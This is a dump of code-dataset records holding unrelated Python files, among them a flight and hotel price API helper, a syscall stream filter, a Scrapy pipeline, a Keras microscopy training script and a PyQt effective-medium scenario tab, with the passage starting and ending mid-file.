city_suggestion_results[0]['PlaceId']\n\n\n@functools.lru_cache(maxsize=1024)\ndef city_string_to_id_for_hotels(city_as_str):\n hotels_service = Hotels(API_KEY)\n city_suggestion_results = hotels_service.location_autosuggest(**{\n 'market': 'TR',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'query': city_as_str\n }).json()['results']\n cities = list(filter(lambda x: x['geo_type'] == 'City', city_suggestion_results))\n\n if not cities:\n return None\n else:\n return cities[0]\n\n\ndef get_best_flight(from_city, to_city, go_date):\n flights_service = Flights(API_KEY)\n from_city_id = city_string_to_id(from_city)\n to_city_id = city_string_to_id(to_city)\n if not from_city_id or not to_city_id:\n return None\n\n flight_resp = flights_service.get_result(**{\n 'market': 'ES',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'country': 'ES',\n 'originplace': from_city_id,\n 'destinationplace': to_city_id,\n 'outbounddate': go_date,\n 'adults': 1,\n 'stops': 0\n })\n\n def get_only_cheapest(iti):\n iti['Pricing'] = iti['PricingOptions'][0]\n del iti['PricingOptions']\n return iti\n\n resp = flight_resp.json()\n try:\n carriers = dict([(carrier['Id'], carrier) for carrier in resp['Carriers']])\n places = dict([(place['Id'], place) for place in resp['Places']])\n # agents = dict([(agent['Id'], agent) for agent in resp['Agents']])\n itineraries = dict(\n [(itinerary['OutboundLegId'], get_only_cheapest(itinerary)) for itinerary in resp['Itineraries']])\n legs = resp['Legs']\n except:\n return None\n\n for leg in legs:\n leg['Carriers'] = list(map(lambda x: carriers[x], leg['Carriers']))\n leg['Itinerary'] = itineraries[leg['Id']]\n leg['DestinationStation'] = places[leg['DestinationStation']]\n leg['OriginStation'] = places[leg['OriginStation']]\n\n if not legs:\n return None\n\n best_offer = random.choice(sorted(legs, key=lambda x: x['Itinerary']['Pricing']['Price'])[:5])\n print(\"Got:\", best_offer['OriginStation']['Name'], best_offer['DestinationStation']['Name'])\n if best_offer:\n return {\n 'type': 'flight',\n 'date': best_offer['Departure'],\n 'price': str(int(best_offer['Itinerary']['Pricing']['Price'])),\n 'description': \"Flight from %s to %s, with %s on %s at %s\" % (\n best_offer['OriginStation']['Name'], best_offer['DestinationStation']['Name'],\n best_offer['Carriers'][0]['Name'],\n parser.parse(best_offer['Departure']).strftime('%B %d, %A'),\n parser.parse(best_offer['Departure']).strftime('%H:%M')),\n 'detailsLink': best_offer['Itinerary']['Pricing']['DeeplinkUrl'],\n 'img': best_offer['Carriers'][0]['ImageUrl']\n # 'details': {\n # 'arrival': best_offer['Arrival'],\n # 'departure': best_offer['Departure'],\n # 'origin': best_offer['OriginStation']['Name'],\n # 'destination': best_offer['DestinationStation']['Name'],\n # 'duration': best_offer['Duration'],\n # 'carrier': best_offer['Carriers'][0]['Name']\n # }\n }\n\n\ndef get_best_hotel(city, date_in, date_out):\n hotels_service = Hotels(API_KEY)\n city = city_string_to_id_for_hotels(city)\n\n resp = hotels_service.get_result(**{\n 'market': 'ES',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'country': 'ES',\n 'entityid': city['individual_id'],\n 'checkindate': date_in,\n 'checkoutdate': date_out,\n 'guests': 1,\n 'rooms': 1\n })\n\n hotels_prices = dict([(hotel['id'], hotel) for hotel in resp.json()['hotels_prices']])\n hotels = sorted(resp.json()['hotels'], key=lambda x: x['popularity'])\n for hotel in hotels:\n hotel['price'] = hotels_prices[hotel['hotel_id']]['agent_prices'][0]['price_total']\n\n if not hotels:\n return {}\n\n the_hotel_offer = random.choice(hotels[:5])\n return {\n 'type': 'hotel',\n 'date': date_out,\n 'price': str(int(the_hotel_offer['price'])),\n #'details': {\n # 'latitude': the_hotel_offer['latitude'],\n # 'longitude': the_hotel_offer['longitude'],\n # 'name': the_hotel_offer['name'],\n # 'checkin': date_in,\n # 'checkout': date_out\n #}\n 'description': \"In %s, stay at %s, until %s\" % (city['display_name'], the_hotel_offer['name'], parser.parse(date_out).strftime(\"%B %d, %Y, %A\")),\n 'detailsLink': '#',\n 'img': ''\n }\n\n\nif __name__ == \"__main__\":\n pp(get_best_hotel('Barcelona', '2016-10-19', '2016-10-20'))\n pass","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"476969758","text":"def exclude_filter(item, exclude_filters):\n \"\"\"compares each column,filter pair in exclude_filters\n\n if one of them is true it returns False to exclude that item\n else it returns true\n\n Parameters\n ----------\n item : list\n current systemcall\n exclude_filters: dict\n column, exclude pairs\n\n Raises\n ------\n IndexError\n If index of column,filter pair is out of bounds\n \"\"\"\n try:\n for column, exclude in exclude_filters.items():\n if type(exclude) == list:\n for exclude_item in exclude:\n if item[column] == exclude_item:\n return False\n\n elif item[column] == exclude:\n return False\n return True\n except IndexError:\n raise SystemExit('ERROR: exclude_filter could not find specified index! check your filter_set')\n\n\ndef trim_filter(item, trim_filters):\n \"\"\"removes given indices from item\n\n Parameters\n ----------\n item : list\n current systemcall\n trim_filters: list\n indices to delete\n \"\"\"\n item_length = len(item)\n # sorting and reversing indices to prevent index shifts while deleting\n for index in sorted(trim_filters, reverse=True):\n if index < (item_length - 1):\n del item[index]\n return item\n\n\ndef filter_generator(item_generator, filter_set):\n \"\"\"applies exclusion and trim filter if given\n\n Parameters\n ----------\n item_generator : generator\n yieldable systemcalls\n filter_set: dict\n filter_set with exclusions and/or trims\n\n format of filter_set = {\n 'exclude': {\n column: 'str',\n ...\n },\n 'trim': [ column, ... ]\n }\n \"\"\"\n for item in item_generator:\n if 'exclude' in filter_set:\n if exclude_filter(item, filter_set['exclude']):\n if 'trim' in filter_set:\n yield trim_filter(item, filter_set['trim'])\n else:\n yield item\n elif 'trim' in filter_set:\n yield trim_filter(item, filter_set['trim'])\n else:\n yield item","sub_path":"ids_lib/generators/filter_stream.py","file_name":"filter_stream.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"459375493","text":"def print_green_bottles_text():\n numbers = ['ten', 'nine', 'eight', 'seven', 'six',\n 'five', 'four', 'three', 'two', 'one', 'no']\n hanging_text = \" green bottle{s} hanging on the wall\"\n i = 0\n for number in numbers[:10]:\n i = i + 1\n print(number.title() + hanging_text.format(s=\"s\" if i != 10 else ''), end=',\\n')\n print(number.title() + hanging_text.format(s=\"s\" if i != 10 else ''), end=',\\n')\n print(\"{text} one green bottle should accidentally fall,\\nThere'll be \"\n .format(text=\"And if\" if i < 10 else \"If that\") + numbers[i] +\n hanging_text.format(s=\"s\" if i != 9 else ''), end='.\\n')\n\n\nprint_green_bottles_text()\n","sub_path":"problems-1/v-leshkevich/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341589899","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport json\n\nclass TuicoolMagsPipeline(object):\n def __init__(self):\n self.art_file=open(\"/root/tuicool_mags/articles.json\",\"wb\")\n self.mag_file=open(\"/root/tuicool_mags/mags.json\",\"wb\")\n self.all_file=open(\"/root/tuicool_mags/all.json\",\"wb\")\n\n def process_item(self, item, spider):\n line=json.dumps(dict(item))+\"\\n\"\n # self.file.write(line)\n if item.get(\"tuicool_id\",\"false\")!=\"false\":\n print(\"ok..............................mags\")\n self.art_file.write(line)\n elif item.get(\"href\",\"false\")!=\"false\":\n print(\"ok....................art\")\n self.mag_file.write(line)\n else:\n print(\"ok........................error\")\n self.all_file.write(line)\n return item\n\n def close_spider(self,spider):\n print(\"ok you're closing spider\")\n self.art_file.close()\n self.mag_file.close()\n","sub_path":"tuicool_mags/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"461625340","text":"problem_dir = 'starting_kit/ingestion_program/'\r\nscore_dir = 'starting_kit/scoring_program/'\r\nresults_dir = 'results/'\r\n\r\nimport os\r\nfrom sys import path; path.append(problem_dir); path.append(score_dir);\r\nfrom data_io import read_as_df, write\r\nfrom data_manager import DataManager\r\nfrom sklearn.metrics import roc_auc_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import load_model\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.preprocessing.image import ImageDataGenerator \r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nimport models\r\n\r\n\r\ndata_dir = 'input_data'\r\ndata_name = 'microscopy'\r\n\r\ndata = read_as_df(data_dir + '/' + data_name)\r\n\r\nD = DataManager(data_name, data_dir, replace_missing=True)\r\n# print(D)\r\n\r\ndef reshape(X):\r\n\tnum = X.shape[0]\r\n\tX = X.reshape((num,40,40,3))\r\n\tX = X / 255.0\r\n\treturn X\r\n\r\nX_train = reshape(D.data['X_train'])\r\nX_test = reshape(D.data['X_test'])\r\nX_valid = reshape(D.data['X_valid'])\r\n\r\nY_train = D.data['Y_train']\r\nY_valid = D.data['Y_valid']\r\nY_test = D.data['Y_test']\r\n\r\nif os.path.exists('saved_model/best_model.h5'):\r\n\tmodel = load_model('saved_model/best_model.h5')\r\nelse:\r\n\tmodel = models.so_model()\r\n\r\n\t\t\r\nes = EarlyStopping(monitor='val_acc',mode='max',verbose=1, patience=50)\r\nmc = ModelCheckpoint('saved_model/best_model.h5', monitor=\"val_acc\",mode=\"max\", verbose=1, save_best_only=True)\r\naug = ImageDataGenerator(rescale=1/255.0,width_shift_range=0.1,height_shift_range=0.1 ,horizontal_flip=True,brightness_range=[0.2,1.0], shear_range=0.1, zoom_range=0.1)\r\n\r\nXTrain, XTest, YTrain, YTest = train_test_split(X_train, Y_train, test_size=0.2, random_state=42)\r\n\r\n\r\nmodel.fit_generator(aug.flow(XTrain,YTrain, batch_size=64), shuffle=True, epochs=1000,steps_per_epoch = len(XTrain) // 64, validation_data=(XTest,YTest), callbacks=[es,mc])\r\n\r\nsaved_model = load_model('saved_model/best_model.h5')\r\n\r\nY_hat_train = saved_model.predict(X_train) \r\nY_hat_valid = saved_model.predict(X_valid)\r\nY_hat_test = saved_model.predict(X_test)\r\n\r\nresults_name = results_dir + data_name\r\nwrite(results_name + '_train.predict', Y_hat_train)\r\nwrite(results_name + '_valid.predict', Y_hat_valid)\r\nwrite(results_name + '_test.predict', Y_hat_test)\r\n\r\nmetric_name, scoring_function = 'auc_binary', roc_auc_score\r\n\r\nprint('Training score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_train, Y_hat_train))\r\n# print('Valid score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_valid, Y_hat_valid))\r\n# print('Test score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_test, Y_hat_test))\r\nprint('Ideal score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_train, Y_train))\r\n\r\n","sub_path":"Data Science Africa 2019/Microscope/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"643726984","text":"#!/usr/bin/python\n### Script to parse the jsondata from i3-msg\n\nimport json;\nimport sys;\n\ninputData = \"\";\n\nfor line in sys.stdin:\n inputData = inputData + line\n\n\njsonData = json.loads(inputData)\n\nfor workspace in jsonData:\n newformat = \"|num:\" + str(workspace[\"num\"])\n newformat += \"|name:\" + workspace[\"name\"]\n newformat += \"|focused:\" + str(workspace[\"focused\"])\n newformat += \"|output:\" + workspace[\"output\"]\n newformat += \"\\n\"\n sys.stdout.write(newformat)\n","sub_path":"config/lemonbar/workspaces.py","file_name":"workspaces.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572919304","text":"from math import atan, sqrt, degrees, sin\nimport serial\n\ndef cartesian_to_polar(*args):\n # Accept both (x, y) as well as x, y\n if len(args) == 1:\n coord = args[0]\n else:\n coord = args\n\n # Calculate the r (distance) and phi (angle) \n distance = sqrt(coord[0] ** 2 + coord[1] ** 2)\n angle = degrees(atan(coord[0] / coord[1]))\n output = distance, angle\n\n # Correct the angle for the four different quadrants\n if coord[1] >= 0:\n if coord[0] < 0:\n return output[0], 90-output[1]\n else:\n return output[0], 270-output[1]\n return output\n\ndef open_connection(port):\n # /dev/ttyUSB0\n cnc_shield = serial.Serial(port, 115200, timeout=1)\n\ndef main():\n pass\n\n## start_x = 0\n## end_x = 100\n## step_x = 0.1\n## for x in range(int(start_x * (1/step_x)), int(end_x * (1/step_x)), int(step_x * (1/step_x))):\n## x /= 1 / step_x\n## y = sin(x)\n## print(cartesian_to_polar(x, y))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Miscellaneous/cartesian_to_polar.py","file_name":"cartesian_to_polar.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"460036842","text":"class Solution:\n # @param {integer} dividend\n # @param {integer} divisor\n # @return {integer}\n def divide(self, dividend, divisor):\n sign=0\n if (dividend>0 and divisor<0) or (dividend<0 and divisor>0):\n sign=1\n \n divd = abs(dividend)\n divi = abs(divisor)\n \n if divi>divd:\n return 0\n \n ret = 0\n d=[]\n d.append(divi)\n i=0\n \n while (d[i]<<1)<=divd:\n d.append(d[i]<<1)\n i+=1\n \n while i>=0:\n while divd-d[i]>=0:\n divd = divd-d[i]\n ret = ret+(1< 0:\n ret = -2147483648\n else:\n if ret>2147483647:\n ret = 2147483647\n return ret\n","sub_path":"Divide_Two_Integers.py","file_name":"Divide_Two_Integers.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184883220","text":"from game.point import Point\nfrom game import constants\n\nimport arcade\n\nclass PokeLab(arcade.Sprite):\n def __init__(self):\n super().__init__()\n\n self.scale = constants.BUILDING_SCALING\n self.textures = []\n\n texture = arcade.load_texture(constants.POKEMON_LAB)\n self.textures.append(texture)\n \n self.texture = self.textures[0]\n\n self.center_x = constants.POKELAB_START_X\n self.center_y = constants.POKELAB_START_Y\n\n self._hit_box_algorithm = \"Simple\"\n points = ((-56.0, -35.0), (-55.0, -36.0), (55.0, -36.0), (56.0, -35.0), (56.0, 31.0), (55.0, 31.0), (-55.0, 31.0), (-56.0, 31.0))\n self.set_hit_box(points)\n self.get_adjusted_hit_box()\n\n\n","sub_path":"pokemon/game/pokelab.py","file_name":"pokelab.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"419219514","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Top-level package for {{ cookiecutter.project_slug }}.\"\"\"\n\nfrom pkg_resources import get_distribution, DistributionNotFound\n\ntry:\n __version__ = get_distribution(__name__).version\nexcept DistributionNotFound:\n __version__ = \"0.1.0.dev0+missinggit\"\n","sub_path":"{{cookiecutter.project_dash_slug}}/{{cookiecutter.project_slug}}/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"428049058","text":"#!/usr/bin/python\n\nimport unittest\nimport pscheduler\nimport json\nimport os\n\nclass TestEnumerate(unittest.TestCase):\n \n path = os.path.dirname(os.path.realpath(__file__))\n\n def get_output(self, args, check_success=True):\n\n args.insert(0, \"%s/../enumerate\" % self.path)\n\n # actually run cli-to-spec with the input\n code, stdout, stderr = pscheduler.run_program(args)\n\n if check_success:\n # make sure it succeeded\n self.assertEqual(code, 0)\n\n # get json out\n if code != 0:\n return stderr\n return json.loads(stdout)\n\n\n def test_enumerate(self):\n data = self.get_output([])\n\n checks = {\n 'maintainer': {\n 'href': 'http://www.perfsonar.net', \n 'name': 'perfSONAR Development Team',\n 'email': 'perfsonar-developer@internet2.edu',\n },\n 'description': 'Measure network throughput between hosts', \n 'version': '1.0', \n 'scheduling-class': 'exclusive', \n 'schema': 1, \n 'name': 'throughput'\n }\n \n for key, val in checks.items():\n if key not in data.keys(): self.fail(\"Missing output key %s\" % key) \n self.assertEqual(val, data[key])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pscheduler-test-throughput/throughput/tests/test-enumerate.py","file_name":"test-enumerate.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"593184921","text":"# -*- coding: utf8 -*-\nimport sys\nimport os.path\nimport numpy as np\nimport Python.Calculator as Calculator\nfrom PyQt5.QtWidgets import QPushButton, QWidget\nfrom PyQt5.QtWidgets import QComboBox, QLabel, QLineEdit, QDoubleSpinBox\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QFormLayout\nfrom PyQt5.QtWidgets import QSpinBox\nfrom PyQt5.QtCore import Qt\nfrom Python.Constants import support_matrix_db, wavenumber, amu, PI\nfrom Python.Constants import avogadro_si\nfrom Python.Utilities import Debug\n\nclass ScenarioTab(QWidget):\n def __init__(self, parent, debug=False): \n super(QWidget, self).__init__(parent)\n global debugger\n debugger = Debug(debug,'ScenarioTab:')\n self.dirty = True\n self.settings = {}\n self.notebook = parent\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n matrix = 'ptfe'\n self.settings['Matrix'] = matrix\n self.settings['Matrix density'] = support_matrix_db[matrix][0]\n self.settings['Matrix permittivity'] = support_matrix_db[matrix][1]\n self.settings['Bubble radius'] = 30.0\n self.settings['Bubble volume fraction'] = 0.0\n self.settings['Mass fraction'] = 0.1\n self.settings['Volume fraction'] = 0.1\n self.settings['Particle size(mu)'] = 0.0001\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n self.settings['Ellipsoid a/b'] = 1.0\n self.settings['Unique direction - h'] = 0\n self.settings['Unique direction - k'] = 0\n self.settings['Unique direction - l'] = 1\n self.settings['Mass or volume fraction'] = 'volume'\n self.settings['ATR material refractive index'] = 4.0\n self.settings['ATR theta'] = 45.0\n self.settings['ATR S polarisation fraction'] = 0.5\n # get the reader from the main tab\n self.notebook = parent\n self.reader = self.notebook.mainTab.reader\n self.settings['Effective medium method'] = 'Maxwell-Garnett'\n # self.methods = ['Maxwell-Garnett', 'Bruggeman', 'Averaged Permittivity', 'Mie', 'Anisotropic-Mie']\n self.methods = ['Maxwell-Garnett', 'Bruggeman', 'Averaged Permittivity', 'Mie']\n self.settings['Particle shape'] = 'Sphere'\n self.shapes = ['Sphere', 'Needle', 'Plate', 'Ellipsoid']\n self.scenarioIndex = None\n # Create a scenario tab \n vbox = QVBoxLayout()\n form = QFormLayout()\n #\n # Support matrix\n #\n self.matrix_cb = QComboBox(self)\n self.matrix_cb.setToolTip('Define the permittivity and density of the support matrix')\n self.matrix_cb.addItems(support_matrix_db)\n index = self.matrix_cb.findText(self.settings['Matrix'], Qt.MatchFixedString)\n if index >=0:\n self.matrix_cb.setCurrentIndex(index)\n else:\n print('support matrix index was not 0',matrix)\n self.matrix_cb.activated.connect(self.on_matrix_cb_activated)\n label = QLabel('Support matrix',self)\n label.setToolTip('Define the permittivity and density of the support matrix')\n form.addRow(label, self.matrix_cb)\n #\n # Support matrix permittivity\n #\n self.density_sb = QDoubleSpinBox(self) \n self.density_sb.setRange(0.001, 100.0)\n self.density_sb.setSingleStep(0.01)\n self.density_sb.setDecimals(3)\n self.density_sb.setToolTip('Define the support matrix density. \\nThis makes changes to the support density and permittivity')\n self.density_sb.setValue(self.settings['Matrix density'])\n self.density_sb.valueChanged.connect(self.on_density_sb_changed)\n label = QLabel('Support density', self)\n label.setToolTip('Define the support matrix density. \\nThis makes changes to the support density and permittivity')\n form.addRow(label, self.density_sb)\n #\n # Support matrix permittivity\n #\n self.permittivity_sb = QDoubleSpinBox(self) \n self.permittivity_sb.setRange(0.001, 100.0)\n self.permittivity_sb.setSingleStep(0.01)\n self.permittivity_sb.setDecimals(3)\n self.permittivity_sb.setToolTip('Define the support matrix permittivity')\n self.permittivity_sb.setValue(self.settings['Matrix permittivity'])\n self.permittivity_sb.valueChanged.connect(self.on_permittivity_sb_changed)\n label = QLabel('Support permittivity', self)\n label.setToolTip('Define the support matrix permittivity')\n form.addRow(label, self.permittivity_sb)\n #\n # Bubble volume fraction\n #\n self.bubble_vf_sb = QDoubleSpinBox(self) \n self.bubble_vf_sb.setRange(0.0, 100.0*(1.0-self.settings['Volume fraction']))\n self.bubble_vf_sb.setSingleStep(1.0)\n self.bubble_vf_sb.setDecimals(1)\n self.bubble_vf_sb.setToolTip('Define the % volume fraction of air bubble inclusions in the matrix')\n self.bubble_vf_sb.setValue(100*self.settings['Bubble volume fraction'])\n self.bubble_vf_sb.valueChanged.connect(self.on_bubble_vf_sb_changed)\n label = QLabel('% Air void volume fraction', self)\n label.setToolTip('Define the % volume fraction of air bubble inclusions in the matrix')\n form.addRow(label, self.bubble_vf_sb)\n #\n # Bubble radius in microns\n #\n self.bubble_radius_sb = QDoubleSpinBox(self) \n self.bubble_radius_sb.setRange(0.001, 1000.0)\n self.bubble_radius_sb.setSingleStep(1.0)\n self.bubble_radius_sb.setDecimals(3)\n self.bubble_radius_sb.setToolTip('Define the air bubble radius')\n self.bubble_radius_sb.setValue(self.settings['Bubble radius'])\n self.bubble_radius_sb.valueChanged.connect(self.on_bubble_radius_sb_changed)\n label = QLabel('Air void radius (μm)', self)\n label.setToolTip('Define the air void radius')\n form.addRow(label, self.bubble_radius_sb)\n #\n # Mass fraction of dielectric medium\n #\n self.mf_sb = QDoubleSpinBox(self)\n self.mf_sb.setRange(0.000001, 100.0)\n self.mf_sb.setSingleStep(0.1)\n self.mf_sb.setDecimals(6)\n self.mf_sb.setToolTip('The percentage mass fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n self.mf_sb.setValue(100.0*self.settings['Mass fraction'])\n self.mf_sb.valueChanged.connect(self.on_mf_sb_changed)\n label = QLabel('% Mass fraction of dielectric', self)\n label.setToolTip('The percentage mass fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n form.addRow(label, self.mf_sb)\n #\n # Volume fraction of dielectric medium\n #\n self.vf_sb = QDoubleSpinBox(self)\n self.vf_sb.setRange(0.000001, 100.0*(1.0-self.settings['Bubble volume fraction']))\n self.vf_sb.setSingleStep(0.1)\n self.vf_sb.setDecimals(6)\n self.vf_sb.setToolTip('The percentage volume fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n self.vf_sb.valueChanged.connect(self.on_vf_sb_changed)\n self.vf_sb.setValue(100.0*self.settings['Volume fraction'])\n label = QLabel('% Volume fraction of dielectric', self)\n label.setToolTip('The percentage volume fraction of the dielectric medium. \\nNote that volume and mass fraction are linked')\n form.addRow(label, self.vf_sb)\n #\n # Calculation method\n #\n self.methods_cb = QComboBox(self)\n self.methods_cb.setToolTip('Choose the calculation method for the effective medium theory')\n self.methods_cb.addItems(self.methods)\n index = self.methods_cb.findText(self.settings['Effective medium method'], Qt.MatchFixedString)\n if index >=0:\n self.methods_cb.setCurrentIndex(index)\n else:\n print('Method index was not 0',self.settings['Effective medium method'])\n self.methods_cb.activated.connect(self.on_methods_cb_activated)\n label = QLabel('Method',self)\n label.setToolTip('Choose the calculation method for the effective medium theory')\n form.addRow(label, self.methods_cb)\n #\n # Particle size option\n #\n self.size_sb = QDoubleSpinBox(self)\n self.size_sb.setRange(0.000001, 1000.0)\n self.size_sb.setSingleStep(0.1)\n self.size_sb.setDecimals(6)\n self.size_sb.setToolTip('Define the particle radius of the sphere in μm.')\n self.size_sb.setValue(self.settings['Particle size(mu)'])\n self.size_sb.valueChanged.connect(self.on_size_sb_changed)\n label = QLabel('Particle radius (μm)',self)\n label.setToolTip('Define the particle radius of the sphere in μm.')\n form.addRow(label, self.size_sb)\n #\n # Particle sigma option\n #\n self.sigma_sb = QDoubleSpinBox(self)\n self.sigma_sb.setRange(0.0, 1000.0)\n self.sigma_sb.setSingleStep(0.1)\n self.sigma_sb.setDecimals(6)\n self.sigma_sb.setToolTip('Define the particle size distribution as a lognormal distribution with the given sigma. \\nOnly applicable for the Mie method')\n self.sigma_sb.setValue(self.settings['Particle size distribution sigma(mu)'])\n self.sigma_sb.valueChanged.connect(self.on_sigma_sb_changed)\n label = QLabel('Particle sigma (μm)',self)\n label.setToolTip('Define the particle size distribition as a lognormal with the given sigma. \\nOnly applicable for the Mie method')\n form.addRow(label, self.sigma_sb)\n #\n # Crystallite shape\n #\n self.shape_cb = QComboBox(self)\n self.shape_cb.setToolTip('Choose a particle shape. \\nFor the Mie methods only sphere is allowed. \\nFor shapes other than sphere there is a unique direction. \\nFor ellipsoidal and needle like this is a direction [abc]. \\nFor a plate the perpendicular to a crystal face (hkl) is used to define the unique direction')\n self.shape_cb.addItems(self.shapes)\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n if index >=0:\n self.shape_cb.setCurrentIndex(index)\n else:\n print('Method index was not 0',self.settings['Particle shape'])\n self.shape_cb.activated.connect(self.on_shape_cb_activated)\n label = QLabel('Particle shape',self)\n label.setToolTip('Choose a particle shape. \\nFor the Mie methods only sphere is allowed. \\nFor shapes other than sphere there is a unique direction. \\nFor ellipsoidal and needle like this is a direction [abc]. \\nFor a plate the perpendicular to a crystal face (hkl) is used to define the unique direction')\n form.addRow(label, self.shape_cb)\n #\n # Particle shape information\n # unique direction (hkl) or [abc]\n self.h_sb = QSpinBox(self)\n self.h_sb.setToolTip('Define the h dimension of the unique direction')\n self.h_sb.setRange(-20,20)\n self.h_sb.setValue(self.settings['Unique direction - h'])\n self.h_sb.valueChanged.connect(self.on_h_sb_changed)\n self.k_sb = QSpinBox(self)\n self.k_sb.setToolTip('Define the k dimension of the unique direction')\n self.k_sb.setRange(-20,20)\n self.k_sb.setValue(self.settings['Unique direction - k'])\n self.k_sb.valueChanged.connect(self.on_k_sb_changed)\n self.l_sb = QSpinBox(self)\n self.l_sb.setToolTip('Define the l dimension of the unique direction')\n self.l_sb.setRange(-20,20)\n self.l_sb.setValue(self.settings['Unique direction - l'])\n self.l_sb.valueChanged.connect(self.on_l_sb_changed)\n hbox = QHBoxLayout()\n hbox.addWidget(self.h_sb)\n hbox.addWidget(self.k_sb)\n hbox.addWidget(self.l_sb)\n self.hkl_label = QLabel('Unique direction [abc]',self)\n self.hkl_label.setToolTip('Define the unique direction by [abc] or (hkl). \\n[abc] is used by needles and ellipsoids. It defines the unique direction in crystallographic units. \\n(hkl) is used by plates it defines a surface and the unique direction is perpendicular to it.')\n\n form.addRow(self.hkl_label, hbox)\n #\n # a over b ratio for ellipse\n #\n self.aoverb_sb = QDoubleSpinBox(self)\n self.aoverb_sb.setRange(0.0, 1000.0)\n self.aoverb_sb.setSingleStep(0.1)\n self.aoverb_sb.setDecimals(6)\n self.aoverb_sb.setToolTip('Define the ellipsoid a/b ratio or eccentricity. \\nOnly applicable for the ellipsoid shapes \\na/b < 1: oblate ellipsoid \\na/b > 1: prolate ellipsoid')\n self.aoverb_sb.setValue(self.settings['Ellipsoid a/b'])\n self.aoverb_sb.valueChanged.connect(self.on_aoverb_sb_changed)\n label = QLabel('Ellipsoid a/b eccentricty',self)\n label.setToolTip('Define the ellipsoid a/b ratio or eccentricity. \\nOnly applicable for the ellipsoid shapes \\na/b < 1: oblate ellipsoid \\na/b > 1: prolate ellipsoid')\n form.addRow(label, self.aoverb_sb)\n #\n # Add ATR options\n # Refractive Index\n self.atr_index_sb = QDoubleSpinBox(self) \n self.atr_index_sb.setRange(0.001, 100.0)\n self.atr_index_sb.setSingleStep(0.01)\n self.atr_index_sb.setDecimals(3)\n self.atr_index_sb.setToolTip('Define the ATR material refractive index')\n self.atr_index_sb.setValue(self.settings['ATR material refractive index'])\n self.atr_index_sb.valueChanged.connect(self.on_atr_index_sb_changed)\n label = QLabel('ATR material refractive index', self)\n label.setToolTip('Define the ATR material refractive index')\n form.addRow(label, self.atr_index_sb)\n # Incident angle in degreees\n self.atr_incident_ang_sb = QDoubleSpinBox(self) \n self.atr_incident_ang_sb.setRange(0.0, 180.0)\n self.atr_incident_ang_sb.setSingleStep(0.1)\n self.atr_incident_ang_sb.setDecimals(1)\n self.atr_incident_ang_sb.setToolTip('Define the ATR incident angle')\n self.atr_incident_ang_sb.setValue(self.settings['ATR theta'])\n self.atr_incident_ang_sb.valueChanged.connect(self.on_atr_incident_ang_sb_changed)\n label = QLabel('ATR incident angle', self)\n label.setToolTip('Define the ATR incident angle')\n form.addRow(label, self.atr_incident_ang_sb)\n # S polarisation fraction\n self.atr_spolfrac_sb = QDoubleSpinBox(self) \n self.atr_spolfrac_sb.setRange(0.0, 1.0)\n self.atr_spolfrac_sb.setSingleStep(0.01)\n self.atr_spolfrac_sb.setDecimals(3)\n self.atr_spolfrac_sb.setToolTip('Define the ATR S polarisation fraction, the rest is P polarisation')\n self.atr_spolfrac_sb.setValue(self.settings['ATR S polarisation fraction'])\n self.atr_spolfrac_sb.valueChanged.connect(self.on_atr_spolfrac_sb_changed)\n label = QLabel('ATR S polarisation fraction', self)\n label.setToolTip('Define the S polarisation fraction, the rest is P polarisation')\n form.addRow(label, self.atr_spolfrac_sb)\n #\n # Add a legend option\n #\n self.legend_le = QLineEdit(self) \n self.legend_le.setToolTip('The legend will be used to describe the results in the plot')\n self.legend_le.setText('Scenario legend')\n self.legend_le.textChanged.connect(self.on_legend_le_changed)\n label = QLabel('Scenario 